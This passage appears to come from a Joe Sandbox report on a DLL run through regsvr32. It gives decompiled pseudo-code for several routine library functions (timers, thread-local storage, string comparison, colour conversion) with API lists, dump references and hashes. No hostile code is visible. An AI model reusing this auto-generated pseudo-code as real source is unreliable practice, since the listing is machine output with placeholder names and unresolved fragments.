					_t81 = _t75;
					if(E1001795E(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E10013FEA(_t75, _t81, _t90, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E10015912(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}


























                                                                                                                0x10042ce7
                                                                                                                0x10042cf0
                                                                                                                0x10042cf2
                                                                                                                0x10042cf8
                                                                                                                0x10042cfb
                                                                                                                0x10042e4e
                                                                                                                0x10042e4e
                                                                                                                0x10042d08
                                                                                                                0x10042d0e
                                                                                                                0x10042d11
                                                                                                                0x10042d1e
                                                                                                                0x10042d30
                                                                                                                0x10042d35
                                                                                                                0x10042d38
                                                                                                                0x10042da4
                                                                                                                0x10042da4
                                                                                                                0x10042da4
                                                                                                                0x10042da8
                                                                                                                0x10042db2
                                                                                                                0x10042e08
                                                                                                                0x10042e0f
                                                                                                                0x10042e19
                                                                                                                0x10042e19
                                                                                                                0x10042e21
                                                                                                                0x10042e27
                                                                                                                0x10042e27
                                                                                                                0x10042e2f
                                                                                                                0x10042e35
                                                                                                                0x10042e3b
                                                                                                                0x10042e44
                                                                                                                0x10042e44
                                                                                                                0x10042e3b
                                                                                                                0x00000000
                                                                                                                0x10042e4b
                                                                                                                0x10042dbb
                                                                                                                0x10042dc1
                                                                                                                0x10042dcd
                                                                                                                0x10042dd1
                                                                                                                0x10042df7
                                                                                                                0x10042df7
                                                                                                                0x10042dfa
                                                                                                                0x10042dfe
                                                                                                                0x10042e02
                                                                                                                0x10042e06
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042e06
                                                                                                                0x10042dd3
                                                                                                                0x10042dd8
                                                                                                                0x00000000
                                                                                                                0x10042de6
                                                                                                                0x10042de9
                                                                                                                0x10042dee
                                                                                                                0x10042df0
                                                                                                                0x10042df0
                                                                                                                0x10042df5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042df5
                                                                                                                0x10042dd8
                                                                                                                0x10042d3c
                                                                                                                0x10042d41
                                                                                                                0x10042d43
                                                                                                                0x10042d4c
                                                                                                                0x10042d62
                                                                                                                0x10042d62
                                                                                                                0x00000000
                                                                                                                0x10042d4e
                                                                                                                0x10042d4e
                                                                                                                0x10042d50
                                                                                                                0x10042d52
                                                                                                                0x10042d52
                                                                                                                0x10042d57
                                                                                                                0x10042d60
                                                                                                                0x10042d66
                                                                                                                0x10042d66
                                                                                                                0x10042d6b
                                                                                                                0x10042d71
                                                                                                                0x10042d6d
                                                                                                                0x10042d6d
                                                                                                                0x10042d6d
                                                                                                                0x10042d7b
                                                                                                                0x10042d82
                                                                                                                0x10042d86
                                                                                                                0x10042d8c
                                                                                                                0x10042d88
                                                                                                                0x10042d88
                                                                                                                0x10042d88
                                                                                                                0x10042d91
                                                                                                                0x10042d9e
                                                                                                                0x10042d9e
                                                                                                                0x10042d91
                                                                                                                0x00000000
                                                                                                                0x10042d82
                                                                                                                0x00000000
                                                                                                                0x10042d60

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000001), ref: 10042CF2
                                                                                                                • GetCursorPos.USER32(?), ref: 10042D11
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10042D1E
                                                                                                                • GetCapture.USER32 ref: 10042D74
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10042DBB
                                                                                                                • WindowFromPoint.USER32 ref: 10042DC7
                                                                                                                • IsChild.USER32(?,00000000), ref: 10042DDC
                                                                                                                • KillTimer.USER32 ref: 10042E19
                                                                                                                • KillTimer.USER32 ref: 10042E35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327746620-0
                                                                                                                • Opcode ID: e02e66b9ae3eb0d9d37a27e792f25bf25985a6027c7ac9bccd68d12e8444e449
                                                                                                                • Instruction ID: cea651eaefb6eae771d5d7c726461fbeb3c05d9cf4bcdf2ee3770a7301017dbb
                                                                                                                • Opcode Fuzzy Hash: e02e66b9ae3eb0d9d37a27e792f25bf25985a6027c7ac9bccd68d12e8444e449
                                                                                                                • Instruction Fuzzy Hash: 8E41BE31B00216EFDB20DB65CD88AAE7BF5FF44360B6102B8E462D72A1DB31DE419B44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020828 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10020828(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10047680(0x1008f521, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10020454(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1009d654;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100205D1( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = L10001311(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = L10001311(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A035(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10049170(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10047725(_t36);
			}














                                                                                                                0x10020828
                                                                                                                0x1002082f
                                                                                                                0x10020834
                                                                                                                0x10020836
                                                                                                                0x10020839
                                                                                                                0x1002083d
                                                                                                                0x10020840
                                                                                                                0x10020846
                                                                                                                0x1002084d
                                                                                                                0x1002094e
                                                                                                                0x1002085c
                                                                                                                0x10020864
                                                                                                                0x10020868
                                                                                                                0x1002089c
                                                                                                                0x1002089f
                                                                                                                0x100208a4
                                                                                                                0x100208a6
                                                                                                                0x100208b2
                                                                                                                0x100208b2
                                                                                                                0x100208a8
                                                                                                                0x100208a8
                                                                                                                0x100208ae
                                                                                                                0x100208ae
                                                                                                                0x100208b4
                                                                                                                0x100208b9
                                                                                                                0x100208bc
                                                                                                                0x100208bf
                                                                                                                0x100208c2
                                                                                                                0x00000000
                                                                                                                0x1002086a
                                                                                                                0x1002086a
                                                                                                                0x10020870
                                                                                                                0x1002087f
                                                                                                                0x1002087f
                                                                                                                0x10020882
                                                                                                                0x100208e6
                                                                                                                0x100208ec
                                                                                                                0x100208f1
                                                                                                                0x10020884
                                                                                                                0x10020889
                                                                                                                0x1002088f
                                                                                                                0x10020892
                                                                                                                0x10020892
                                                                                                                0x100208f7
                                                                                                                0x100208f9
                                                                                                                0x100208fe
                                                                                                                0x10020904
                                                                                                                0x10020904
                                                                                                                0x1002090c
                                                                                                                0x1002091d
                                                                                                                0x10020929
                                                                                                                0x1002092e
                                                                                                                0x10020934
                                                                                                                0x10020934
                                                                                                                0x10020870
                                                                                                                0x10020937
                                                                                                                0x1002093c
                                                                                                                0x10020946
                                                                                                                0x10020946
                                                                                                                0x10020949
                                                                                                                0x10020949
                                                                                                                0x1002094f
                                                                                                                0x1002095a

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002082F
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000010,10020AE1,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 10020840
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002085E
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10020892
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 100208FE
                                                                                                                • _memset.LIBCMT ref: 1002091D
                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00000058,10006BB6), ref: 1002092E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 1002094F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1891723912-0
                                                                                                                • Opcode ID: faa515bd76de5715681dbbe460871e214a9cfb5e8ea6330566e2be09664c3bf2
                                                                                                                • Instruction ID: 2a10743f259bda41ed7af136b0d3390e832e65cc4432432f01a26c55eb007b07
                                                                                                                • Opcode Fuzzy Hash: faa515bd76de5715681dbbe460871e214a9cfb5e8ea6330566e2be09664c3bf2
                                                                                                                • Instruction Fuzzy Hash: CC319E74400706EFEB10DF60DC8599AB7B6FF00360B61C66AF95A97562CB70AD90CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002942E Relevance: 13.6, APIs: 9, Instructions: 85stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002942E(void* __esi, char* _a4, int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				int _v1572;
				char* _v1576;
				void* __ebx;
				void* __edi;
				signed int _t20;
				int _t23;
				void* _t26;
				char* _t35;
				int _t37;
				void* _t42;
				char* _t43;
				void* _t47;
				signed int _t49;

				_t44 = __esi;
				_t20 =  *0x100b9e70; // 0xbb35530
				_v8 = _t20 ^ _t49;
				_t37 = _a8;
				_t43 = _a4;
				_v1576 = _t37;
				if(lstrcmpiA(_t43, _t37) == 0) {
					_t23 = GetSystemMetrics(0x2a);
					if(_t23 != 0) {
						_push(__esi);
						_v1572 = lstrlenA(_t43);
						if(_v1572 != lstrlenA(_t37)) {
							L13:
							_t26 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t43, 0xffffffff,  &_v1568);
							GetStringTypeA(_t37, 4, _t43, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 1, _v1576, 0xffffffff,  &_v1048);
							_t35 = _t43;
							if( *_t43 == 0) {
								L10:
								_t26 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x61c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x414))) {
									_t47 = _t47 + 2;
									if( *_t35 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
						_pop(_t44);
					} else {
						_t26 = _t23 + 1;
					}
				} else {
					_t26 = 0;
				}
				return E1004763E(_t26, _t37, _v8 ^ _t49, _t42, _t43, _t44);
			}




















                                                                                                                0x1002942e
                                                                                                                0x10029437
                                                                                                                0x1002943e
                                                                                                                0x10029442
                                                                                                                0x10029446
                                                                                                                0x1002944b
                                                                                                                0x10029459
                                                                                                                0x10029464
                                                                                                                0x1002946c
                                                                                                                0x10029474
                                                                                                                0x1002947f
                                                                                                                0x1002948d
                                                                                                                0x1002951a
                                                                                                                0x1002951a
                                                                                                                0x10029493
                                                                                                                0x1002949f
                                                                                                                0x100294ae
                                                                                                                0x100294bd
                                                                                                                0x100294d1
                                                                                                                0x100294d6
                                                                                                                0x100294d8
                                                                                                                0x10029506
                                                                                                                0x10029508
                                                                                                                0x100294da
                                                                                                                0x100294da
                                                                                                                0x100294dc
                                                                                                                0x100294fa
                                                                                                                0x10029504
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10029504
                                                                                                                0x00000000
                                                                                                                0x100294dc
                                                                                                                0x100294d8
                                                                                                                0x10029509
                                                                                                                0x10029509
                                                                                                                0x1002946e
                                                                                                                0x1002946e
                                                                                                                0x1002946e
                                                                                                                0x1002945b
                                                                                                                0x1002945b
                                                                                                                0x1002945b
                                                                                                                0x10029517

                                                                                                                APIs
                                                                                                                • lstrcmpiA.KERNEL32(?,00000000,00000000), ref: 10029451
                                                                                                                • GetSystemMetrics.USER32 ref: 10029464
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystemlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335526769-0
                                                                                                                • Opcode ID: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
                                                                                                                • Instruction ID: ec0d1c6a6b6d5934df8a485b178ddfb646fdcce51f2dd72e4357131ab1d54fac
                                                                                                                • Opcode Fuzzy Hash: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
                                                                                                                • Instruction Fuzzy Hash: 29210871A00269AAEB11DF749C84FDB7BEDEB4A7A0F6002A1FD16D21C1DA749D41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100253FF Relevance: 13.6, APIs: 9, Instructions: 79threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100253FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t33;
				void* _t44;
				int _t45;
				intOrPtr _t53;
				void* _t60;
				struct HWND__* _t62;
				void* _t65;
				void* _t66;

				_t60 = __edx;
				_push(8);
				E1004764D(0x1008f872, __ebx, __edi, __esi);
				_t62 =  *(_t66 + 8);
				E1001F0AF(_t62,  *((intOrPtr*)(_t66 + 0xc)));
				E100176B3( *((intOrPtr*)(_t62 + 4)),  *((intOrPtr*)(_t66 + 0xc)), _t66 + 8);
				if(_t62->i == 0) {
					_t33 = GetThreadLocale();
					__imp__#232( *(_t66 + 0x10), _t33, 0, _t66 - 0x10);
					__eflags = _t33;
					if(__eflags >= 0) {
						E1000B053(0, _t66 - 0x14, _t62, __esi, __eflags);
						 *((intOrPtr*)(_t66 - 4)) = 1;
						__imp__#6( *((intOrPtr*)(_t66 - 0x10)),  *((intOrPtr*)(_t66 - 0x10)));
						E100219F5(_t66 - 0x14, _t60,  *(_t66 + 8),  *((intOrPtr*)(_t66 - 0x14)));
						_t53 =  *((intOrPtr*)(_t66 - 0x14));
						goto L6;
					}
				} else {
					_t64 = GetWindowTextLengthA( *(_t66 + 8));
					L1000140B(_t66 + 0xc, E100184C0());
					_t8 = _t64 + 1; // 0x1
					 *((intOrPtr*)(_t66 - 4)) = 0;
					GetWindowTextA( *(_t66 + 8), E100103E6(_t66 + 0xc, _t37), _t8);
					E1000FED3(_t66 + 0xc, 0xffffffff);
					_t44 = E100147D9(0, _t66 + 0xc, _t60, _t62, _t37);
					_t65 = _t44;
					_t45 = GetThreadLocale();
					__imp__#197(_t65, _t45, 0,  *(_t66 + 0x10));
					 *(_t66 + 0x10) = _t45;
					__imp__#6(_t65);
					_t69 =  *(_t66 + 0x10);
					if( *(_t66 + 0x10) < 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf111);
						E1001B561(0, _t60, _t62, _t65, _t69);
						E1001ECE0(_t62);
					}
					_t53 =  *((intOrPtr*)(_t66 + 0xc));
					L6:
					_t33 = L100013E3(_t53 + 0xfffffff0, _t60);
				}
				return E10047725(_t33);
			}











                                                                                                                0x100253ff
                                                                                                                0x100253ff
                                                                                                                0x10025406
                                                                                                                0x1002540b
                                                                                                                0x10025413
                                                                                                                0x10025422
                                                                                                                0x1002542b
                                                                                                                0x100254b7
                                                                                                                0x100254c1
                                                                                                                0x100254c7
                                                                                                                0x100254c9
                                                                                                                0x100254d1
                                                                                                                0x100254d9
                                                                                                                0x100254e0
                                                                                                                0x100254ec
                                                                                                                0x100254f1
                                                                                                                0x00000000
                                                                                                                0x100254f1
                                                                                                                0x10025431
                                                                                                                0x1002543a
                                                                                                                0x10025445
                                                                                                                0x1002544a
                                                                                                                0x10025452
                                                                                                                0x1002545e
                                                                                                                0x10025469
                                                                                                                0x10025471
                                                                                                                0x10025479
                                                                                                                0x1002547c
                                                                                                                0x10025484
                                                                                                                0x1002548b
                                                                                                                0x1002548e
                                                                                                                0x10025494
                                                                                                                0x10025497
                                                                                                                0x10025499
                                                                                                                0x1002549b
                                                                                                                0x1002549c
                                                                                                                0x100254a1
                                                                                                                0x100254a8
                                                                                                                0x100254a8
                                                                                                                0x100254ad
                                                                                                                0x100254f4
                                                                                                                0x100254f7
                                                                                                                0x100254f7
                                                                                                                0x10025501

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025406
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025434
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 1002545E
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • GetThreadLocale.KERNEL32(00000000,?,000000FF), ref: 1002547C
                                                                                                                • VarDecFromStr.OLEAUT32(00000000,00000000), ref: 10025484
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1002548E
                                                                                                                  • Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568
                                                                                                                  • Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
                                                                                                                  • Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21
                                                                                                                • GetThreadLocale.KERNEL32(00000000,?,?,?,?,00000008), ref: 100254B7
                                                                                                                • VarBstrFromDec.OLEAUT32(?,00000000), ref: 100254C1
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 100254E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromH_prolog3LocaleStringTextThreadWindow$BstrFocusItemLengthMessageSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376774703-0
                                                                                                                • Opcode ID: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
                                                                                                                • Instruction ID: 8efa296c8f4f5d99c1d74aff30f9075005738b09ad55c9108602e393422d39f0
                                                                                                                • Opcode Fuzzy Hash: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
                                                                                                                • Instruction Fuzzy Hash: A831717950011AFFDF01EFA0CD858FE7B3AFF05355B508218F9269A1A2CB31AA51DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001159 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10001159(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t57;
				intOrPtr _t61;
				intOrPtr* _t75;
				short _t105;
				unsigned int _t110;
				void* _t126;
				void* _t146;
				void* _t148;
				void* _t149;
				void* _t157;

				_t157 = __fp0;
				_t143 = __edx;
				_push(0x18);
				E1004764D(0x1008da9e, __ebx, __edi, __esi);
				_t148 = __ecx;
				_t113 =  *((intOrPtr*)(_t149 + 0x10));
				_t153 =  *((intOrPtr*)(_t149 + 0x10));
				if( *((intOrPtr*)(_t149 + 0x10)) != 0) {
					L10001127(__ebx, _t113, __edx, __edi, __ecx, _t153);
				}
				_t57 = E10001041(_t148 + 0x148);
				_t145 = 0xff;
				 *(_t149 - 0x1c) = 0xff - _t57;
				 *((intOrPtr*)(_t149 - 0x18)) = 0xff - E10001041(_t148 + 0x250);
				 *((intOrPtr*)(_t149 - 0x14)) = 0xff - E10001041(_t148 + 0x2d4);
				_t105 = 0xf0 - E10001041(_t148 + 0x1cc);
				_t61 =  *((intOrPtr*)(_t149 + 0x10));
				_t154 =  *((intOrPtr*)(_t61 + 0x20)) -  *((intOrPtr*)(_t148 + 0x1ec));
				if( *((intOrPtr*)(_t61 + 0x20)) !=  *((intOrPtr*)(_t148 + 0x1ec))) {
					_t110 = 0 << 0x00000008 |  *(_t149 - 0x1c) & 0x000000ff;
					ColorRGBToHLS(0 << 8, _t149 - 0x24, _t149 - 0x10, _t149 - 0x20);
					__eflags = 0xf0;
					_push(0xf0 - ( *(_t149 - 0x10) & 0x0000ffff));
					_t126 = _t148 + 0x1cc;
				} else {
					ColorRGBToHLS(0 << 0x00000008 |  *(_t149 - 0x1c) & 0x000000ff, _t149 - 0x24, _t149 - 0x10, _t149 - 0x20);
					 *(_t149 - 0x10) = _t105 & 0x0000ffff;
					_t110 = ColorHLSToRGB( *(_t149 - 0x24), _t105,  *(_t149 - 0x20));
					L1000100A(_t110, _t148 + 0x148, _t143, 0xff, _t149, _t154, 0xff - (_t110 & 0x000000ff));
					L1000100A(_t110, _t148 + 0x250, _t143, 0xff, _t149, _t154, 0xff - (_t110 & 0x000000ff));
					_t145 = 0xff - (_t110 >> 0x00000010 & 0x000000ff);
					_push(0xff);
					_t126 = _t148 + 0x2d4;
				}
				L1000100A(_t110, _t126, _t143, _t145, _t149, _t154);
				_t146 = InvalidateRect;
				 *(_t148 + 0xf0) =  *(_t149 - 0x10) & 0x0000ffff;
				 *(_t148 + 0xec) = _t110;
				InvalidateRect( *(_t148 + 0x9c), 0, 1);
				_t155 =  *((intOrPtr*)(_t148 + 0x78));
				if( *((intOrPtr*)(_t148 + 0x78)) != 0) {
					L1000CFF6(_t148 + 0x74);
				}
				E10001091(_t148 + 0x74, _t110);
				L1000140B(_t149 - 0x1c, E100184C0());
				 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
				_push(0);
				_push(_t110);
				_push(_t149 - 0x18);
				_t75 = L100012F3(_t110, _t146, _t148, _t155, _t157);
				 *(_t149 - 4) = 1;
				L1000106E(_t149 - 0x1c, " Similar to %s ",  *_t75);
				 *(_t149 - 4) = 0;
